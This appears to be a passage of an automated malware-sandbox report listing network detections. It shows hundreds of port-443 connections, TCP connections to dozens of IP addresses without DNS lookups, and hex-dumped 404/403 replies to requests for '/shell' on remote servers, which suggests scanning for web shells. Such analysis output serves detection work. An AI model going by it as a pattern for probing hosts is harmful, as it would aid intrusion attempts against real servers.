Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52250
Source: unknown	Network traffic detected: HTTP traffic on port 43474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43624
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55528
Source: unknown	Network traffic detected: HTTP traffic on port 49032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55886
Source: unknown	Network traffic detected: HTTP traffic on port 52042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42768
Source: unknown	Network traffic detected: HTTP traffic on port 33558 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41792
Source: unknown	Network traffic detected: HTTP traffic on port 45530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43730
Source: unknown	Network traffic detected: HTTP traffic on port 43624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56624
Source: unknown	Network traffic detected: HTTP traffic on port 59820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51178
Source: unknown	Network traffic detected: HTTP traffic on port 35282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55410
Source: unknown	Network traffic detected: HTTP traffic on port 40370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42878
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40450
Source: unknown	Network traffic detected: HTTP traffic on port 36446 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown	Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53402
Source: unknown	Network traffic detected: HTTP traffic on port 47758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53890
Source: unknown	Network traffic detected: HTTP traffic on port 41074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44404
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45612
Source: unknown	Network traffic detected: HTTP traffic on port 37910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52322
Source: unknown	Network traffic detected: HTTP traffic on port 56212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54988
Source: unknown	Network traffic detected: HTTP traffic on port 38556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 51794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45600
Source: unknown	Network traffic detected: HTTP traffic on port 36150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40030
Source: unknown	Network traffic detected: HTTP traffic on port 46490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34630 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33610
Source: unknown	Network traffic detected: HTTP traffic on port 56956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51490
Source: unknown	Network traffic detected: HTTP traffic on port 44788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41598
Source: unknown	Network traffic detected: HTTP traffic on port 57878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43532
Source: unknown	Network traffic detected: HTTP traffic on port 51930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55616
Source: unknown	Network traffic detected: HTTP traffic on port 56118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38628 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39276
Source: unknown	Network traffic detected: HTTP traffic on port 45528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown	Network traffic detected: HTTP traffic on port 55356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60088
Source: unknown	Network traffic detected: HTTP traffic on port 39022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40258
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47840
Source: unknown	Network traffic detected: HTTP traffic on port 56608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33558
Source: unknown	Network traffic detected: HTTP traffic on port 52624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53170
Source: unknown	Network traffic detected: HTTP traffic on port 58234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47958
Source: unknown	Network traffic detected: HTTP traffic on port 46726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41058
Source: unknown	Network traffic detected: HTTP traffic on port 37660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45530
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40084
Source: unknown	Network traffic detected: HTTP traffic on port 39440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34878
Source: unknown	Network traffic detected: HTTP traffic on port 44556 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54480 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55356
Source: unknown	Network traffic detected: HTTP traffic on port 44986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48916
Source: unknown	Network traffic detected: HTTP traffic on port 56260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41048
Source: unknown	Network traffic detected: HTTP traffic on port 56018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45528
Source: unknown	Network traffic detected: HTTP traffic on port 55810 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 119.56.28.63
Source: unknown	TCP traffic detected without corresponding DNS query: 164.163.128.63
Source: unknown	TCP traffic detected without corresponding DNS query: 48.38.69.47
Source: unknown	TCP traffic detected without corresponding DNS query: 143.132.170.4
Source: unknown	TCP traffic detected without corresponding DNS query: 18.200.65.140
Source: unknown	TCP traffic detected without corresponding DNS query: 174.36.86.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.22.25.60
Source: unknown	TCP traffic detected without corresponding DNS query: 120.254.4.252
Source: unknown	TCP traffic detected without corresponding DNS query: 136.125.53.152
Source: unknown	TCP traffic detected without corresponding DNS query: 88.92.139.157
Source: unknown	TCP traffic detected without corresponding DNS query: 17.126.211.13
Source: unknown	TCP traffic detected without corresponding DNS query: 97.51.17.237
Source: unknown	TCP traffic detected without corresponding DNS query: 124.55.13.245
Source: unknown	TCP traffic detected without corresponding DNS query: 66.57.111.242
Source: unknown	TCP traffic detected without corresponding DNS query: 170.137.120.145
Source: unknown	TCP traffic detected without corresponding DNS query: 129.178.172.113
Source: unknown	TCP traffic detected without corresponding DNS query: 189.51.76.83
Source: unknown	TCP traffic detected without corresponding DNS query: 146.21.183.227
Source: unknown	TCP traffic detected without corresponding DNS query: 220.123.121.129
Source: unknown	TCP traffic detected without corresponding DNS query: 189.58.217.237
Source: unknown	TCP traffic detected without corresponding DNS query: 103.250.214.19
Source: unknown	TCP traffic detected without corresponding DNS query: 160.131.164.73
Source: unknown	TCP traffic detected without corresponding DNS query: 90.162.2.0
Source: unknown	TCP traffic detected without corresponding DNS query: 18.125.221.149
Source: unknown	TCP traffic detected without corresponding DNS query: 42.170.246.198
Source: unknown	TCP traffic detected without corresponding DNS query: 189.156.239.99
Source: unknown	TCP traffic detected without corresponding DNS query: 19.215.22.39
Source: unknown	TCP traffic detected without corresponding DNS query: 40.209.239.25
Source: unknown	TCP traffic detected without corresponding DNS query: 109.184.221.7
Source: unknown	TCP traffic detected without corresponding DNS query: 34.201.98.214
Source: unknown	TCP traffic detected without corresponding DNS query: 27.216.202.208
Source: unknown	TCP traffic detected without corresponding DNS query: 35.238.214.190
Source: unknown	TCP traffic detected without corresponding DNS query: 136.9.83.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.104.209.158
Source: unknown	TCP traffic detected without corresponding DNS query: 144.218.109.233
Source: unknown	TCP traffic detected without corresponding DNS query: 65.30.16.229
Source: unknown	TCP traffic detected without corresponding DNS query: 46.130.222.64
Source: unknown	TCP traffic detected without corresponding DNS query: 24.228.230.209
Source: unknown	TCP traffic detected without corresponding DNS query: 189.178.155.10
Source: unknown	TCP traffic detected without corresponding DNS query: 115.56.233.238
Source: unknown	TCP traffic detected without corresponding DNS query: 188.90.244.109
Source: unknown	TCP traffic detected without corresponding DNS query: 34.241.47.49
Source: unknown	TCP traffic detected without corresponding DNS query: 76.135.222.6
Source: unknown	TCP traffic detected without corresponding DNS query: 181.186.150.189
Source: unknown	TCP traffic detected without corresponding DNS query: 142.5.66.155
Source: unknown	TCP traffic detected without corresponding DNS query: 133.167.106.171
Source: unknown	TCP traffic detected without corresponding DNS query: 31.195.48.73
Source: unknown	TCP traffic detected without corresponding DNS query: 209.67.64.250
Source: unknown	TCP traffic detected without corresponding DNS query: 161.58.75.134
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.171.22

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:31 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:37 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:05:55 GMTServer: WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:43 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-Encoding,User-AgentCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=1, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 